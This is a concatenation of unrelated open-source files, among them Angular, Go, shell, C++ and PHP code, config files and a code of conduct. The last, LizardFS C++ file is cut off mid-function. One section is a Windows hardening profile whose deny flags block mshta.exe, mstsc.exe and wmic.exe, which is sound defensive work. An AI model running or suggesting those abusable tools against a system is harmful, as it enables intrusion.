'maxPodsPerNode': '10',
},
'podIpv4CidrSize': 24,
'locations': [
'europe-west2-c',
'europe-west2-b',
'europe-west2-a',
],
'selfLink': 'https://container.googleapis.com/v1/projects/test-cluster/locations/europe-west2/clusters/test-cluster/nodePools/default-111-111-111-111-gke-17',
'version': '1.14.10-gke.17',
'instanceGroupUrls': [
'https://www.googleapis.com/compute/v1/projects/test-cluster/zones/europe-west2-a/instanceGroupManagers/gke-gcp-111-111-111-111-1-1-111-111',
],
'status': 'RUNNING',
}],
}],
}
| {
"pile_set_name": "Github"
} |
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<Description>App Metrics App Metapackage - Contains all features for an AspNetCore application.</Description>
<AssemblyTitle>App.Metrics.AspNetCore.All</AssemblyTitle>
<TargetFrameworks>netstandard2.0;netcoreapp3.1</TargetFrameworks>
<PackageTags>appmetrics;aspnetcore;metrics</PackageTags>
</PropertyGroup>
<ItemGroup>
<PackageReference Include="App.Metrics.Extensions.Collectors" />
<PackageReference Include="App.Metrics.Extensions.Configuration" />
<PackageReference Include="App.Metrics.Extensions.DependencyInjection" />
<PackageReference Include="App.Metrics.Extensions.Hosting" />
<PackageReference Include="App.Metrics.AspNetCore" />
<PackageReference Include="App.Metrics.AspNetCore.Endpoints" />
<PackageReference Include="App.Metrics.AspNetCore.Hosting" />
<PackageReference Include="App.Metrics.AspNetCore.Mvc" />
<PackageReference Include="App.Metrics.AspNetCore.Routing" />
<PackageReference Include="App.Metrics.AspNetCore.Tracking" />
<PackageReference Include="App.Metrics.Extensions.HealthChecks" />
<PackageReference Include="App.Metrics.Formatters.Json" />
</ItemGroup>
</Project>
| {
"pile_set_name": "Github"
} |
import {
ChangeDetectionStrategy,
Component,
EventEmitter,
forwardRef,
Input,
OnDestroy,
Output,
ViewChild,
ViewEncapsulation,
} from '@angular/core';
import { ControlValueAccessor, NG_VALUE_ACCESSOR } from '@angular/forms';
import { PickerBaseComponent } from './picker-base.component';
import { PickerComponent } from './picker.component';
import { PickerChangeData, PickerCityData, PickerCityDataMap, PickerGroupChange } from './picker.types';
const DATA_MAP: PickerCityDataMap = {
label: 'name',
value: 'code',
items: 'sub',
};
/**
 * City picker (does not include city data; see the demo for the expected data format)
*/
@Component({
selector: 'weui-city-picker',
exportAs: 'weuiCityPicker',
template: `
<weui-picker
[placeholder]="placeholder"
[groups]="_groups!"
[defaultSelect]="_selected"
[disabled]="disabled"
[title]="title"
[options]="options"
(show)="_onShow()"
(hide)="_onHide()"
(change)="_onChange($event)"
(groupChange)="_onGroupChange($event)"
(cancel)="_onCityCancelChange()"
></weui-picker>
`,
providers: [
{
provide: NG_VALUE_ACCESSOR,
useExisting: forwardRef(() => CityPickerComponent),
multi: true,
},
],
preserveWhitespaces: false,
changeDetection: ChangeDetectionStrategy.OnPush,
encapsulation: ViewEncapsulation.None,
})
export class CityPickerComponent extends PickerBaseComponent implements ControlValueAccessor, OnDestroy {
@Input()
set dataMap(val: PickerCityDataMap) {
this._dataMap = {
...DATA_MAP,
...val,
};
}
@Input()
set data(d: PickerCityData[]) {
this._tmpData = d;
this.parseData(this._tmpData, this._dataMap.items, this._selected);
}
@ViewChild(PickerComponent, { static: true }) private readonly pickerComp: PickerComponent;
@Output() readonly change = new EventEmitter<PickerChangeData>();
private _tmpData: PickerCityData[] | null = null;
private _dataMap = DATA_MAP;
_value: string;
_groups: PickerCityData[][] | null = [];
_selected: number[] = [];
private onChange = (_: string) => {};
private onTouched = () => {};
private parseData(
data: PickerCityData[],
subKey: string,
selected: number[] = [],
group: PickerCityData[][] = [],
newSelected: number[] = [],
): { groups: PickerCityData[][]; newSelected: number[] } {
let _selected = 0;
if (Array.isArray(selected) && selected.length > 0) {
const _selectedClone = selected.slice(0);
_selected = _selectedClone.shift()!;
selected = _selectedClone;
}
if (typeof data[_selected] === 'undefined') {
_selected = 0;
}
newSelected.push(_selected);
const item = data[_selected];
const _group = JSON.parse(JSON.stringify(data)) as PickerCityData[];
const map = this._dataMap;
_group.forEach((g: PickerCityData) => {
delete g[subKey];
g.label = g[map.label];
g.value = g[map.value];
});
group.push(_group);
if (typeof item[subKey] !== 'undefined' && Array.isArray(item[subKey])) {
return this.parseData(item[subKey], subKey, selected, group, newSelected);
} else {
this._groups = group;
this._selected = newSelected;
return { groups: group, newSelected };
}
}
/**
 * Convert the value into selected indices
*/
private valueToSelect(data: PickerCityData[], subKey: string, dept: number = 1, newSelected: number[] = []): number[] {
const code = (this._value.substr(0, dept * 2) + '0000').substr(0, 6);
let _selected = data.findIndex((w: PickerCityData) => w[this._dataMap.value] === code);
if (_selected <= -1) {
_selected = 0;
}
newSelected.push(_selected);
const item = data[_selected];
if (typeof item[subKey] !== 'undefined' && Array.isArray(item[subKey])) {
return this.valueToSelect(item[subKey], subKey, ++dept, newSelected);
} else {
this._selected = newSelected;
setTimeout(() => {
this.pickerComp._setText();
}, 100);
return newSelected;
}
}
_onChange(data: PickerChangeData): void {
this.onChange(data.value);
this.onTouched();
this.change.emit(data);
}
_onGroupChange(res: PickerGroupChange): void {
this._selected[res.groupIndex] = res.index;
if (res.groupIndex !== 2) {
this.parseData(this._tmpData!, this._dataMap.items, this._selected);
}
this.groupChange.emit(res);
}
_onCityCancelChange(): void {
this.cancel.emit();
}
/** Used by the Service wrapper; has no practical meaning on its own */
_triggerShow(): void {
this.pickerComp._onShow();
}
_onShow(): void {
this.show.emit();
}
_onHide(): void {
this.hide.emit();
}
writeValue(value: string): void {
if (!value) {
this.pickerComp._text = '';
return;
}
this._value = value;
if (this._value && this._value.length === 6) {
const items = this._dataMap.items;
this.valueToSelect(this._tmpData!, items, 1);
this.parseData(this._tmpData!, items, this._selected);
}
}
registerOnChange(fn: (_: string) => {}): void {
this.onChange = fn;
}
registerOnTouched(fn: () => {}): void {
this.onTouched = fn;
}
setDisabledState(isDisabled: boolean): void {
this.disabled = isDisabled;
}
ngOnDestroy(): void {
this._tmpData = null;
this._groups = null;
}
}
| {
"pile_set_name": "Github"
} |
package runhcs
import "net/url"
const (
SafePipePrefix = `\\.\pipe\ProtectedPrefix\Administrators\`
)
// ShimSuccess is the byte stream returned on a successful operation.
var ShimSuccess = []byte{0, 'O', 'K', 0}
func SafePipePath(name string) string {
// Use a pipe in the Administrators protected prefixed to prevent malicious
// squatting.
return SafePipePrefix + url.PathEscape(name)
}
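A small companion test is sketched below (not from the original repository) to illustrate what SafePipePath produces and how ShimSuccess is meant to be compared. The file name and the escaped output are assumptions based on url.PathEscape's documented behaviour (a space becomes %20).

// Hypothetical pipe_test.go in the same package, for illustration only.
package runhcs

import (
	"bytes"
	"testing"
)

func TestSafePipePathEscapes(t *testing.T) {
	// PathEscape turns the space into %20, so the name cannot break out of
	// the protected Administrators prefix.
	got := SafePipePath("my container")
	want := SafePipePrefix + "my%20container"
	if got != want {
		t.Fatalf("got %q, want %q", got, want)
	}
	// A client reading a shim's reply would compare it against ShimSuccess.
	if !bytes.Equal(ShimSuccess, []byte{0, 'O', 'K', 0}) {
		t.Fatal("unexpected ShimSuccess contents")
	}
}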
| {
"pile_set_name": "Github"
} |
# Contributor Covenant Code of Conduct
## Our Pledge
In the interest of fostering an open and welcoming environment, we as
contributors and maintainers pledge to making participation in our project and
our community a harassment-free experience for everyone, regardless of age, body
size, disability, ethnicity, gender identity and expression, level of experience,
nationality, personal appearance, race, religion, or sexual identity and
orientation.
## Our Standards
Examples of behavior that contributes to creating a positive environment
include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community
* Showing empathy towards other community members
Examples of unacceptable behavior by participants include:
* The use of sexualized language or imagery and unwelcome sexual attention or
advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic
address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a
professional setting
## Our Responsibilities
Project maintainers are responsible for clarifying the standards of acceptable
behavior and are expected to take appropriate and fair corrective action in
response to any instances of unacceptable behavior.
Project maintainers have the right and responsibility to remove, edit, or
reject comments, commits, code, wiki edits, issues, and other contributions
that are not aligned to this Code of Conduct, or to ban temporarily or
permanently any contributor for other behaviors that they deem inappropriate,
threatening, offensive, or harmful.
## Scope
This Code of Conduct applies both within project spaces and in public spaces
when an individual is representing the project or its community. Examples of
representing a project or community include using an official project e-mail
address, posting via an official social media account, or acting as an appointed
representative at an online or offline event. Representation of a project may be
further defined and clarified by project maintainers.
## Enforcement
Instances of abusive, harassing, or otherwise unacceptable behavior may be
reported by contacting the project team at [email protected]. All
complaints will be reviewed and investigated and will result in a response that
is deemed necessary and appropriate to the circumstances. The project team is
obligated to maintain confidentiality with regard to the reporter of an incident.
Further details of specific enforcement policies may be posted separately.
Project maintainers who do not follow or enforce the Code of Conduct in good
faith may face temporary or permanent repercussions as determined by other
members of the project's leadership.
## Attribution
This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
available at [http://contributor-covenant.org/version/1/4][version]
[homepage]: http://contributor-covenant.org
[version]: http://contributor-covenant.org/version/1/4/
| {
"pile_set_name": "Github"
} |
#! /bin/sh
# Modified by Princeton University on April 3, 2016
# ========== Copyright Header Begin ==========================================
#
# OpenSPARC T1 Processor File: rsyn
# Copyright (c) 2006 Sun Microsystems, Inc. All Rights Reserved.
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES.
#
# The above named program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public
# License version 2 as published by the Free Software Foundation.
#
# The above named program is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with this work; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ========== Copyright Header End ============================================
#
# SCCS ID: @(#).perl_wrapper 1.1 02/03/99
#
# Cloned from .common_tool_wrapper
loginfo () {
echo "DATE: "`date`
echo "WRAPPER: $TRE_PROJECT/tools/bin/perl_wrapper"
echo "USER: "$user
echo "HOST: "`uname -n`
echo "SYS: "`uname -s` `uname -r`
echo "PWD: "`pwd`
echo "ARGV: "$ARGV
echo "TOOL: "$tool
echo "VERSION: "$version
echo "TRE_SEARCH: "$TRE_SEARCH
echo "TRE_ENTRY: "$TRE_ENTRY
}
mailinfo () {
echo To: $1
echo Subject: TRE_LOG
echo "#"
loginfo
}
mailerr () {
echo "To: $1"
echo "Subject: TRE ERROR"
echo "#"
echo "ERROR: $2"
loginfo
}
log () {
# Log to TRE_LOG if it is set properly.
# It is STRONGLY recommended that TRE_LOG be an e-mail address
# in order to avoid problems with several people simultanously
# writing to the same file.
# TRE_LOG must be set, but it can be broken.
# TRE_ULOG is optional, for users who want their own logging.
if [ ! -z "$TRE_LOG_ENABLED" ] ; then
if [ ! -z "$TRE_LOG" ] ; then
# Check first if TRE_LOG is a file (this is cheap).
if [ -f $TRE_LOG -a -w $TRE_LOG ] ; then
echo "#" >> $TRE_LOG
loginfo >> $TRE_LOG
elif /usr/lib/sendmail -bv $TRE_LOG 1>&- 2>&- ; then
mailinfo $TRE_LOG | /usr/lib/sendmail $TRE_LOG
else
mailerr $user "Can't log to TRE_LOG=$TRE_LOG. Fix environment." | /usr/lib/sendmail $user
fi
else
die "TRE_LOG environment variable is not set."
fi
fi
# TRE_ULOG is optional user log. EMAIL address is recommended.
if [ ! -z "$TRE_ULOG" ] ; then
# Check first if TRE_ULOG is a file (this is cheap).
if [ -f $TRE_ULOG -a -w $TRE_ULOG ] ; then
echo "#" >> $TRE_ULOG
loginfo >> $TRE_ULOG
elif /usr/lib/sendmail -bv $TRE_ULOG 1>&- 2>&- ; then
mailinfo $TRE_ULOG | /usr/lib/sendmail $TRE_ULOG
else
mailerr $user "Can't log to TRE_ULOG=$TRE_ULOG. Fix environment." | /usr/lib/sendmail $user
fi
fi
}
die () {
message="$1"
echo "$tool -> perl_wrapper: $message Exiting ..."
if [ ! -z "$TRE_LOG" ] ; then
if [ -f ${TRE_LOG} -a -w ${TRE_LOG} ] ; then
echo "#" >> $TRE_LOG
echo "ERROR: $message" >> $TRE_LOG
loginfo >> $TRE_LOG
elif /usr/lib/sendmail -bv $TRE_LOG 1>&- 2>&- ; then
mailerr $TRE_LOG "$message" | /usr/lib/sendmail $TRE_LOG
else
echo "Can not log to TRE_LOG=${TRE_LOG}. Logging to '$user.'"
mailerr $user "$message" | /usr/lib/sendmail $user
fi
fi
# TRE_ULOG is optional user log. EMAIL address is recommended.
if [ ! -z "$TRE_ULOG" ] ; then
if [ -f ${TRE_ULOG} -a -w ${TRE_ULOG} ] ; then
echo "#" >> $TRE_ULOG
echo "ERROR: $message" >> $TRE_ULOG
loginfo >> $TRE_ULOG
elif /usr/lib/sendmail -bv $TRE_ULOG 1>&- 2>&- ; then
mailerr $TRE_ULOG "$message" | /usr/lib/sendmail $TRE_ULOG
else
echo "Can not log to TRE_ULOG=${TRE_ULOG}. Logging to '$user.'"
mailerr $user "$message" | /usr/lib/sendmail $user
fi
fi
exit 1
}
############################ main ##############################
tool=`basename $0`
ARGV="$*"
TRE_PROJECT=$DV_ROOT
if [ -z "$TRE_PROJECT" ]; then
die "TRE_PROJECT not defined"
fi
TRE_ROOT=$TRE_PROJECT/tools/perlmod
### Verify TRE_SEARCH and TRE_ENTRY are defined and non-null
if [ -z "$TRE_SEARCH" ]; then
die "TRE_SEARCH not defined"
fi
if [ -z "$TRE_ENTRY" ]; then
die "TRE_ENTRY not defined"
fi
### Get version, based on tool invoked, and $TRE_ENTRY
if [ $tool = "configsrch" ] ; then
exe=$TRE_ROOT/$tool
exec $exe "$@"
exit
else
version=`configsrch $tool $TRE_ENTRY 2>&1`
stat=$?
if [ $stat != 0 ] ; then
die "configsrch returned error code $stat"
fi
### Verify configsrch delivered a non-null version
if [ -z "$version" ]; then
die "No version set by configsrch"
fi
fi
### Assemble do-file name. If it's there, execute and test status.
exe=$TRE_ROOT/$tool,$version.do
if [ -x $exe ]; then
$exe
dostat=$?
if [ $? != 0 ] ; then
die "Error return from do file"
fi
fi
OS=`uname -s`
if [ $OS = "SunOS" ] ; then
user=`/usr/ucb/whoami`
CPU=`uname -p`
fi
if [ $OS = "Linux" ]; then
user=`/usr/bin/whoami`
CPU=`uname -m`
fi
if [ -z "$PERL_VER" ] ; then
if [ -z "$PERL5OPT" ] ; then
PERL5OPT="-I$PERL_MODULE_BASE -I$PERL_MODULE_BASE/$OS-$CPU"
else
PERL5OPT="-I$PERL_MODULE_BASE -I$PERL_MODULE_BASE/$OS-$CPU $PERL5OPT"
fi
else
if [ -z "$PERL5OPT" ] ; then
PERL5OPT="-I$PERL_MODULE_BASE -I$PERL_MODULE_BASE/$OS-$CPU -I$PERL5_PATH/$PERL_VER -I$PERL5_PATH/$PERL_VER/sun4-solaris"
else
PERL5OPT="-I$PERL_MODULE_BASE -I$PERL_MODULE_BASE/$OS-$CPU -I$PERL5_PATH/$PERL_VER -I$PERL5_PATH/$PERL_VER/sun4-solaris $PERL5OPT"
fi
fi
export PERL5OPT
exe=$TRE_ROOT/$tool,$version
if [ -x $exe ]; then
exec $PERL_CMD $exe "$@"
else
die "executable $exe not found!"
fi
| {
"pile_set_name": "Github"
} |
/**
* This header is generated by class-dump-z 0.2b.
*
* Source: /System/Library/PrivateFrameworks/OfficeImport.framework/OfficeImport
*/
#import <OfficeImport/XXUnknownSuperclass.h>
__attribute__((visibility("hidden")))
@interface OCXSStreamLevel : XXUnknownSuperclass {
@private
char *mName; // 4 = 0x4
int mDepth; // 8 = 0x8
}
@property(assign, nonatomic) char *name; // G=0x2c9955; S=0x191b79; @synthesize=mName
@property(assign, nonatomic) int depth; // G=0x191d09; S=0x191b89; @synthesize=mDepth
// declared property getter: - (int)depth; // 0x191d09
// declared property setter: - (void)setDepth:(int)depth; // 0x191b89
// declared property getter: - (const char *)name; // 0x2c9955
// declared property setter: - (void)setName:(const char *)name; // 0x191b79
@end
| {
"pile_set_name": "Github"
} |
const testUtil = require('../../lib');
module.exports = {
name: 'storage',
run: async function(context) {
if (context.parameters.options.help) {
const header = `amplify mock ${this.name} \nDescriptions:
Mock Storage locally`;
context.amplify.showHelp(header, []);
return;
}
try {
await testUtil.storage.start(context);
} catch (e) {
context.print.error(e.message);
}
},
};
| {
"pile_set_name": "Github"
} |
Få Nutriscore
| {
"pile_set_name": "Github"
} |
test
tes
tes
| {
"pile_set_name": "Github"
} |
/**
* Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
* SPDX-License-Identifier: Apache-2.0.
*/
#pragma once
#include <aws/ecs/ECS_EXPORTS.h>
#include <aws/core/utils/memory/stl/AWSString.h>
namespace Aws
{
namespace ECS
{
namespace Model
{
enum class ProxyConfigurationType
{
NOT_SET,
APPMESH
};
namespace ProxyConfigurationTypeMapper
{
AWS_ECS_API ProxyConfigurationType GetProxyConfigurationTypeForName(const Aws::String& name);
AWS_ECS_API Aws::String GetNameForProxyConfigurationType(ProxyConfigurationType value);
} // namespace ProxyConfigurationTypeMapper
} // namespace Model
} // namespace ECS
} // namespace Aws
| {
"pile_set_name": "Github"
} |
IsMshta.exeBlocked
IsMstsc.exeBlocked
IsWmic.exeBlocked
;********* Beginning of ini section *********
SKIN=MAmbre
ListColor=14671585
White List
Skip DLLs
ON
ON
ON
OFF
OFF
OFF
OFF
Standard User
ON
ON
ON
OFF3
OFF
ON1
OFF
OFF
Adobe + VBA
ON
OFF
OFF
OFF
ON
END
;********* Beginning of profile info section *********
Harden Windows 10 while maintaining maximum functionality and compatibility (proposed on Malwaretips forum by @Windows_Security).
Settings applied: "Recommended Settings" for Windows 10 + "allowed EXE and MSI files in UserSpace" + "three blocked Sponsors" + "Windows Scripts allowed with admin rights" + "only signed executables can elevate" + "Run By SmartScreen"
Please note: This profile allow installing/executing/updating unsigned applications only if they do not require Administrative rights. There are no such restrictions for signed applications.
In this profile, most applications can auto-update. The EXE and MSI application installers can be run normally because they are allowed by SRP.
It is recommended to use this profile with ConfigureDefender HIGH Protection Level (if WD is the main antivirus) and "Recommended H_C" firewall outbound block rules (see <FirewallHardening> option).
The profile works best when the user installs digitally signed applications (EXE / MSI). The unsigned applications which do not require Administrative rights can be run safely via "Run By SmartScreen" entry from the right-click Explorer context menu.
When an unsigned file is blocked because it cannot elevate, an error message is displayed which ends with:
"... A referral was returned from the server". | {
"pile_set_name": "Github"
} |
// Protocol Buffers - Google's data interchange format
// Copyright 2008 Google Inc. All rights reserved.
// http://code.google.com/p/protobuf/
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
// Author: [email protected] (Brian Duff)
// Based on original Protocol Buffers design by
// Sanjay Ghemawat, Jeff Dean, and others.
#ifndef GOOGLE_PROTOBUF_COMPILER_JAVANANO_EXTENSION_H_
#define GOOGLE_PROTOBUF_COMPILER_JAVANANO_EXTENSION_H_
#include <google/protobuf/stubs/common.h>
#include <google/protobuf/compiler/javanano/javanano_params.h>
#include <google/protobuf/descriptor.pb.h>
namespace google {
namespace protobuf {
namespace io {
class Printer; // printer.h
}
}
namespace protobuf {
namespace compiler {
namespace javanano {
class ExtensionGenerator {
public:
explicit ExtensionGenerator(const FieldDescriptor* descriptor, const Params& params);
~ExtensionGenerator();
void Generate(io::Printer* printer) const;
private:
const Params& params_;
const FieldDescriptor* descriptor_;
std::map<string, string> variables_;
GOOGLE_DISALLOW_EVIL_CONSTRUCTORS(ExtensionGenerator);
};
} // namespace javanano
} // namespace compiler
} // namespace protobuf
} // namespace google
#endif // GOOGLE_PROTOBUF_COMPILER_JAVANANO_EXTENSION_H_
| {
"pile_set_name": "Github"
} |
<?php
/*
|--------------------------------------------------------------------------
| Model Factories
|--------------------------------------------------------------------------
|
| Here you may define all of your model factories. Model factories give
| you a convenient way to create models for testing and seeding your
| database. Just tell the factory how a default model should look.
|
*/
/** @var \Illuminate\Database\Eloquent\Factory $factory */
$factory->define(App\User::class, function (Faker\Generator $faker) {
static $password;
return [
'name' => $faker->name,
'email' => $faker->unique()->safeEmail,
'password' => $password ?: $password = bcrypt('secret'),
'remember_token' => str_random(10),
];
});
$factory->define(App\Post::class, function(Faker\Generator $faker) {
return [
'title' => $faker->realText(rand(40, 80)),
'body' => $faker->realText(rand(200, 6000)),
'user_id' => function() {
return \App\User::inRandomOrder()->first()->id;
}
];
});
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2002-2020 "Neo4j,"
* Neo4j Sweden AB [http://neo4j.com]
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.neo4j.cypher.internal.parser.privilege
class DbmsPrivilegeRevokeDenyTests extends DbmsPrivilegeAdministrationCommandParserTest {
privilegeTests("REVOKE DENY", "FROM", revokeDenyDbmsPrivilege)
}
| {
"pile_set_name": "Github"
} |
/*
Copyright 2013-2016 Skytechnology sp. z o.o.
This file is part of LizardFS.
LizardFS is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, version 3.
LizardFS is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with LizardFS. If not, see <http://www.gnu.org/licenses/>.
*/
#include "common/platform.h"
#include "common/read_plan_executor.h"
#include <chrono>
#include <map>
#include <set>
#include "common/block_xor.h"
#include "common/chunkserver_stats.h"
#include "common/exceptions.h"
#include "common/lambda_guard.h"
#include "common/lizardfs_version.h"
#include "common/massert.h"
#include "common/mfserr.h"
#include "common/read_operation_executor.h"
#include "common/sockets.h"
#include "common/time_utils.h"
#include "devtools/request_log.h"
#include "protocol/cltocs.h"
std::atomic<uint64_t> ReadPlanExecutor::executions_total_;
std::atomic<uint64_t> ReadPlanExecutor::executions_with_additional_operations_;
std::atomic<uint64_t> ReadPlanExecutor::executions_finished_by_additional_operations_;
ReadPlanExecutor::ReadPlanExecutor(ChunkserverStats &chunkserver_stats, uint64_t chunk_id,
uint32_t chunk_version, std::unique_ptr<ReadPlan> plan)
: stats_(chunkserver_stats),
chunk_id_(chunk_id),
chunk_version_(chunk_version),
plan_(std::move(plan)) {
}
/*! \brief A function which starts a single read operation from a chunkserver.
*
* \param params Execution parameters pack.
* \param chunk_type Chunk part type to start read read operation for.
* \param op Structure describing read operation.
*
* \return true on success.
* false on failure.
*/
bool ReadPlanExecutor::startReadOperation(ExecuteParams ¶ms, ChunkPartType chunk_type,
const ReadPlan::ReadOperation &op) {
#ifndef NDEBUG
auto it = std::find(networking_failures_.begin(), networking_failures_.end(), chunk_type);
assert(it == networking_failures_.end());
assert(params.locations.count(chunk_type));
#endif
if (op.request_size <= 0) {
available_parts_.push_back(chunk_type);
return true;
}
const ChunkTypeWithAddress &ctwa = params.locations.at(chunk_type);
stats_.registerReadOperation(ctwa.address);
try {
Timeout connect_timeout(std::chrono::milliseconds(params.connect_timeout));
int fd = params.connector.startUsingConnection(ctwa.address, connect_timeout);
try {
if (params.total_timeout.expired()) {
// totalTimeout might expire during establishing the connection
throw RecoverableReadException("Chunkserver communication timed out");
}
ReadOperationExecutor executor(op, chunk_id_, chunk_version_, chunk_type, ctwa.address,
ctwa.chunkserver_version, fd, params.buffer);
executor.sendReadRequest(connect_timeout);
executors_.insert(std::make_pair(fd, std::move(executor)));
} catch (...) {
tcpclose(fd);
throw;
}
return true;
} catch (ChunkserverConnectionException &ex) {
last_connection_failure_ = ctwa.address;
stats_.markDefective(ctwa.address);
networking_failures_.push_back(chunk_type);
return false;
}
}
/*! \brief A function which starts a new prefetch operation.
*
* \param params Execution parameters pack.
* \param chunk_type Chunk part type to start prefetch read operation for.
* \param op Structure describing prefetch operation.
*/
void ReadPlanExecutor::startPrefetchOperation(ExecuteParams ¶ms, ChunkPartType chunk_type,
const ReadPlan::ReadOperation &op) {
assert(params.locations.count(chunk_type));
if (op.request_size <= 0) {
return;
}
const ChunkTypeWithAddress &ctwa = params.locations.at(chunk_type);
try {
Timeout connect_timeout(std::chrono::milliseconds(params.connect_timeout));
int fd = params.connector.startUsingConnection(ctwa.address, connect_timeout);
try {
if (params.total_timeout.expired()) {
// totalTimeout might expire during establishing the connection
throw RecoverableReadException("Chunkserver communication timed out");
}
std::vector<uint8_t> message;
if (ctwa.chunkserver_version >= kFirstECVersion) {
cltocs::prefetch::serialize(message, chunk_id_, chunk_version_, chunk_type,
op.request_offset, op.request_size);
} else if (ctwa.chunkserver_version >= kFirstXorVersion) {
assert((int)chunk_type.getSliceType() < Goal::Slice::Type::kECFirst);
cltocs::prefetch::serialize(message, chunk_id_, chunk_version_,
(legacy::ChunkPartType)chunk_type, op.request_offset,
op.request_size);
}
if (message.size() > 0) {
int32_t ret =
tcptowrite(fd, message.data(), message.size(), connect_timeout.remaining_ms());
if (ret != (int32_t)message.size()) {
throw ChunkserverConnectionException(
"Cannot send PREFETCH request to the chunkserver: " +
std::string(strerr(tcpgetlasterror())),
ctwa.address);
}
}
} catch (...) {
tcpclose(fd);
throw;
}
params.connector.endUsingConnection(fd, ctwa.address);
} catch (ChunkserverConnectionException &ex) {
// That's a pity
}
}
/*! \brief A function that starts all read operations for a wave.
*
* \param params Execution parameters pack.
* \param wave Wave index.
*
* \return Number of failed read operations.
*/
int ReadPlanExecutor::startReadsForWave(ExecuteParams ¶ms, int wave) {
int failed_reads = 0;
for (const auto &read_operation : plan_->read_operations) {
if (read_operation.second.wave == wave) {
if (!startReadOperation(params, read_operation.first, read_operation.second)) {
++failed_reads;
}
}
}
if (!plan_->isFinishingPossible(networking_failures_)) {
throw RecoverableReadException("Can't connect to " + last_connection_failure_.toString());
}
return failed_reads;
}
/*! \brief A function that starts all prefetch operations for a wave.
*
* \param params Execution parameters pack.
* \param wave Wave index.
*/
void ReadPlanExecutor::startPrefetchForWave(ExecuteParams ¶ms, int wave) {
if (plan_->disable_prefetch) {
return;
}
for (const auto &prefetch_operation : plan_->read_operations) {
if (prefetch_operation.second.wave == wave) {
startPrefetchOperation(params, prefetch_operation.first, prefetch_operation.second);
}
}
}
/*! \brief Function waits for data from chunkservers.
*
* \param params Execution parameters pack.
* \param wave_timeout Timeout class keeping time to end of current wave.
* \param poll_fds Vector with pollfds structures resulting from call to poll system function.
 * \return true on success,
 *         false if EINTR occurred (the call to waitForData should be repeated)
*/
bool ReadPlanExecutor::waitForData(ExecuteParams ¶ms, Timeout &wave_timeout,
std::vector<pollfd> &poll_fds) {
// Prepare for poll
poll_fds.clear();
for (const auto &fd_and_executor : executors_) {
poll_fds.push_back({fd_and_executor.first, POLLIN, 0});
}
if (poll_fds.empty()) {
return true;
}
// Call poll
int poll_timeout = std::max(
0, (int)std::min(params.total_timeout.remaining_ms(), wave_timeout.remaining_ms()));
int status = tcppoll(poll_fds, poll_timeout);
if (status < 0) {
#ifdef _WIN32
throw RecoverableReadException("Poll error: " + std::string(strerr(tcpgetlasterror())));
#else
if (errno == EINTR) {
return false;
} else {
throw RecoverableReadException("Poll error: " + std::string(strerr(tcpgetlasterror())));
}
#endif
}
return true;
}
/*! \brief Read data from chunkserver.
*
* \param params Execution parameters pack.
* \param poll_fd pollfd structure with the IO events.
* \param executor Executor for which some data are available.
*/
bool ReadPlanExecutor::readSomeData(ExecuteParams ¶ms, const pollfd &poll_fd,
ReadOperationExecutor &executor) {
const NetworkAddress &server = executor.server();
try {
if (poll_fd.revents & POLLIN) {
executor.continueReading();
} else if (poll_fd.revents & (POLLHUP | POLLERR | POLLNVAL)) {
throw ChunkserverConnectionException("Read from chunkserver (poll) error", server);
}
} catch (ChunkserverConnectionException &ex) {
stats_.markDefective(server);
networking_failures_.push_back(executor.chunkType());
tcpclose(poll_fd.fd);
executors_.erase(poll_fd.fd);
if (!plan_->isFinishingPossible(networking_failures_)) {
throw;
}
return false;
}
if (executor.isFinished()) {
stats_.unregisterReadOperation(server);
stats_.markWorking(server);
